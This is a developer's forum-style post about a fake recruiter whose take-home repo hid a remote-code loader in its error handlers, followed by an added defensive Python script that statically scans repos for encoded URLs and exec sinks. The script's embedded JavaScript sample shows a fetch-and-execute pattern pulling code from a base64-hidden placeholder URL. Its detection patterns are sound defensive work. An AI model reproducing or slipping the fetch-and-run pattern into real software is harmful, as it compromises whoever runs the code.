SE with 8 yrs under my keyboard - been on the hunt for a new salary position (currently freelance), and I just had my first interesting scam attempt 👏🏽 I assume most people on the web are sus until proven otherwise. I wish I didn't; however, it's my default at this point - and it saved my ass once again 😮💨
Had a recruiter reach out about a position - profile looked normal-ish, company looked normal-ish, nothing immediate stood out, comms were leaning AI but not beyond the normal level of human laziness in 2026, and no obvious typos, etc. Was given a take-home assignment: a small, well-structured repo with a few tasks. They say to do any of the tasks but point you to a specific one - and then one of them specifically tells you to look for, fix, and write tests for bugs (min of 5), so you expect to have errors out of the gate. What's the first thing you'd normally do a few years ago? Read the README, follow the instructions, run the app, do the tasks, fix the bugs. If you did that here, despite nothing immediately suspicious, you'd have been compromised 🥲
Given just how shady things can be on the web and having seen more rugs and scam attempts than anyone outside of the web3 trenches could imagine, I set a pre-step for myself and ran a full codebase analysis (y'all know I hate AI, but it's useful when guided with a steady hand). I included very clear instructions/configs to execute nothing - run no dev servers, call no endpoints, and strictly walk through the code helping me search for holes, weird patterns, compromises, and various attack vectors. Just a sanity check before I dug in - thought I'd find nothing. Instead, I found a very interesting injection point in the pre-built error handlers that would actually run an API call at the beginning of every app execution -> call an encrypted URL (hidden in a hardcoded string) and return arbitrary and executable code on the server that called it (i.e. the applicant's machine). Now, despite being mildly terrifying, this could have still been part of that QA assignment and something they "expected" you to find/fix... but that was a little too sus for me. Fast forward to more [dev] paranoia-induced research, and I found: mismatching company addrs, fake testimonials, a dead guy being impersonated (bruh), and [thankfully] 2 small posts calling out similar circumstances with the same company. Reported my findings (respectively) to the "recruiter" and asked if they could provide clarity on anything - instantly stopped our message session and deleted the account lol, scam confirmed.
An important lesson, my fellow devs (especially those of you that are newer)... NEVER blindly run code unless you know where it came from... and even then, don't trust - verify ⌨️🙏🏼⌨️
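As an added, defensive illustration of the "execute nothing" pre-step described above (this is example code written for this page, not the poster's tooling), here is a small static triage script that flags base64-encoded URLs, dynamic-execution sinks and network calls in JavaScript sources without running any of them; the error handler it scans, `HIDDEN` and `SAMPLE`, is constructed for the example.

```python
import base64
import re
from pathlib import Path

# Patterns a small take-home app has no legitimate reason to contain.
SINK_RE = re.compile(r"\b(eval|new\s+Function|execSync|child_process\.\w+|vm\.\w+)\s*\(")
NET_RE = re.compile(r"\b(fetch|axios(?:\.\w+)?|https?\.(?:get|request))\s*\(")
STRING_RE = re.compile(r"""(['"`])([A-Za-z0-9+/=]{16,})\1""")
URL_RE = re.compile(r"https?://\S+")

def decode_hidden_urls(line):
    """Return decoded URLs hiding inside base64-looking string literals."""
    urls = []
    for _, literal in STRING_RE.findall(line):
        try:
            decoded = base64.b64decode(literal, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not text: leave it alone
        urls.extend(URL_RE.findall(decoded))
    return urls

def scan_source(text):
    """Return (line_no, kind, detail) findings; nothing in `text` is executed."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        findings += [(line_no, "encoded-url", u) for u in decode_hidden_urls(line)]
        findings += [(line_no, "exec-sink", m.group(1)) for m in SINK_RE.finditer(line)]
        findings += [(line_no, "network", m.group(1)) for m in NET_RE.finditer(line)]
    return findings

def scan_repo(root, exts=(".js", ".mjs", ".cjs", ".ts")):
    """Scan every source file under `root`, skipping node_modules."""
    results = {}
    for path in Path(root).rglob("*"):
        if path.suffix in exts and "node_modules" not in path.parts:
            hits = scan_source(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                results[str(path)] = hits
    return results

# Constructed sample: an error handler that fetches a hidden URL and runs the reply.
HIDDEN = base64.b64encode(b"https://example.invalid/stage2").decode()
SAMPLE = f"""app.use(async (err, req, res, next) => {{
  const cfg = '{HIDDEN}';
  const body = await (await fetch(Buffer.from(cfg, 'base64').toString())).text();
  new Function(body)();
  next(err);
}});"""
```

Run `scan_repo(".")` on a cloned take-home before following its README; a hit of all three kinds on neighbouring lines is the fetch-and-eval shape described in the post and is worth reading by hand before anything is started.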